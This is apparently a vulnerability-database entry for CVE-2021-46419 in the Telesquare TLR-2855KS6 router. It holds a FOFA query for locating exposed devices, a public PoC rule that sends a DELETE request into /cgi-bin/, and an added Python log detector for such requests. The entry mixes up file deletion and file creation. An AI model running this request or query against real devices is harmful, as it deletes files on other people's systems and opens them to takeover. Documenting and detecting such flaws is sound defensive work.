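CVE-2021-46419: Telesquare TLR-2855KS6 - Arbitrary File Deletion

Date: 2025-09-01 | Affected software: Telesquare TLR-2855KS6 | POC: Public

Vulnerability description

Telesquare TLR-2855KS6 contains a vulnerability that allows unauthorized file creation via the PUT method, which can allow creation of CGI scripts.
fofa-query: product=="TELESQUARE-TLR-2855KS6"

PoC code [public]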

id: CVE-2021-46419

info:
  name: Telesquare TLR-2855KS6 - 任意文件删除
  author: Momen Eldawakhly (Cyber Guy)
  severity: critical
  description: |
    Telesquare TLR-2855KS6 中存在通过 PUT 方法创建未授权文件的漏洞,可允许创建 CGI 脚本。
    fofa-query: product=="TELESQUARE-TLR-2855KS6"
  reference:
    - https://www.exploit-db.com/exploits/50863
    - http://packetstormsecurity.com/files/166675/Telesquare-TLR-2855KS6-Arbitrary-File-Deletion.html
    - https://drive.google.com/drive/folders/1TWw3Oy0wZImSHK_hj-tKkbn9sFgqqySp

rules:
  r0:
    request:
      method: DELETE
      path: /cgi-bin/testing_cve.txt
    expression: response.status == 204 && response.headers["server"].icontains("lighttpd")
expression: r0()
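
A log check for the request pattern the rule above probes, as an added example that is not part of the original PoC or of any vendor tooling: it flags DELETE or PUT requests under /cgi-bin/ that the server answered with a 2xx status. The log layout (lighttpd's default accesslog.format), the sample lines, the host name and `sample.cgi` are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed layout: lighttpd's default accesslog.format
#   %h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Za-z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
WRITE_METHODS = {"DELETE", "PUT"}  # the two methods named on this page

# Constructed sample lines (documentation addresses, hypothetical host name).
SAMPLE_LOG = [
    '192.0.2.10 router.example - [01/Sep/2025:10:00:01 +0000] '
    '"GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 router.example - [01/Sep/2025:10:00:05 +0000] '
    '"DELETE /cgi-bin/testing_cve.txt HTTP/1.1" 204 0 "-" "-"',
    '198.51.100.7 router.example - [01/Sep/2025:10:00:09 +0000] '
    '"PUT //cgi-bin/sample.cgi HTTP/1.1" 201 0 "-" "-"',
    '203.0.113.5 router.example - [01/Sep/2025:10:02:00 +0000] '
    '"DELETE /cgi-bin/old.txt HTTP/1.1" 403 0 "-" "-"',
]

def normalise(target):
    """Drop the query string, percent-decode, collapse '//', './' and '../'."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath("/" + path.lstrip("/"))

def suspicious_requests(lines):
    """Return (client, time, method, path, status) for accepted writes under /cgi-bin/."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m is None:
            continue  # line is not in the assumed format
        method, status = m["method"].upper(), int(m["status"])
        path = normalise(m["target"])
        if method in WRITE_METHODS and path.startswith("/cgi-bin/") and 200 <= status < 300:
            hits.append((m["client"], m["time"], method, path, status))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit)
```

Rejected requests (the 403 line) and ordinary GETs are not reported; only writes the server accepted are.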
